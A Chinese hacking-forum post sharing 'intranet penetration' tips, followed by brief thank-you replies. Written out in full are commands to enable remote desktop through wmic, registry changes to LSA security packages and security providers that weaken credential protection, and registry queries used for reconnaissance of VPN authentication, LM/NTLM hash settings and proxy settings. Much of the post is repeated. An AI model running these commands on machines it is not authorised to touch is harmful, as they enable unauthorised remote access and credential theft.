内网渗透的小小小技巧
再不冒泡ID被封了,发点小小小的技巧,平时工作中所遇到的。大牛勿喷。
看过大牛发过CMD开远程桌面,我再补充一条 :
开启远程桌面,适用环境 WIN2K3 -- WIN2012XP链接高版本远程桌面显示:远程计算机需要网络级别身份验证,而您的计算机不支持该验证解决办法,需要重新启动机器 。
关于VPN验证方式: VPN验证方式分为本机验证和RASIUR 认证
在注册表以下位置保存:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Authentication\Providers
--ActiveProvider
{1AA7F83F-C7F5-11D0-A376-00C04FC9DA04} == RASIUR 认证
---Servers
{1AA7F841-C7F5-11D0-A376-00C04FC9DA04} == Windows认证
----------------------------------------------------------------------------------------------------
Providers 下的 ActiveProvider 等于 3F 或者 41 可以判断认证方式----------------------
判断机器NT密码验证方式,默认 WIN7+都是NTLM方式 但是有时候有些管理员把2K3的也可能修改成NTLM验证方式,在注册表以下位置保存
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"nolmhash"=dword:00000000 "nolmhash"=dword:00000001
查询方式00 LM
01 NTLM
注册表查询用户代理信息,代理服务器分为直接设置的PROXY SERVER地址 和PAC文件两种 (需要用户权限).
代理IP设置获取PAC设置---
-------------------
欢淫内网渗透的大牛们加好友,求指导。
看过大牛发过CMD开远程桌面,我再补充一条 :
开启远程桌面,适用环境 WIN2K3 -- WIN2012
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0" /t REG_MULTI_SZ /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders /v "SecurityProviders" /d "msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, credssp.dll" /f
关于VPN验证方式: VPN验证方式分为本机验证和RASIUR 认证
在注册表以下位置保存:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Authentication\Providers
--ActiveProvider
{1AA7F83F-C7F5-11D0-A376-00C04FC9DA04} == RASIUR 认证
---Servers
{1AA7F841-C7F5-11D0-A376-00C04FC9DA04} == Windows认证
----------------------------------------------------------------------------------------------------
Providers 下的 ActiveProvider 等于 3F 或者 41 可以判断认证方式
reg query HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\Authentication\Providers /v ActiveProvider
判断机器NT密码验证方式,默认 WIN7+都是NTLM方式 但是有时候有些管理员把2K3的也可能修改成NTLM验证方式,在注册表以下位置保存
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"nolmhash"=dword:00000000 "nolmhash"=dword:00000001
查询方式
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v nolmhash
01 NTLM
注册表查询用户代理信息,代理服务器分为直接设置的PROXY SERVER地址 和PAC文件两种 (需要用户权限).
代理IP设置
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings /v ProxyServer
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings /v AutoConfigURL
-------------------
欢淫内网渗透的大牛们加好友,求指导。
评论50次
膜拜,谢谢分享。
感谢分享,可惜我没发现
这个比较实用,多谢楼主分享。
楼主威武。。。不过我还没试过,看上去好牛逼
感谢lz分享啊~~
好吧 表示科普到了
这个开 3389 的语句很赞
看支持的情况还不错!
过来学xi一下。
膜拜大牛
look look.
超赞~很不错的内容
谢谢分享啊
这个要存起来。。。
不错,真研究内网渗透,多谢啦
楼主撸过多少内网了
学xi了,遇到过类似问题。谢谢楼主
感谢分享 ...................................
支持一下~不错
已收藏,感谢分享。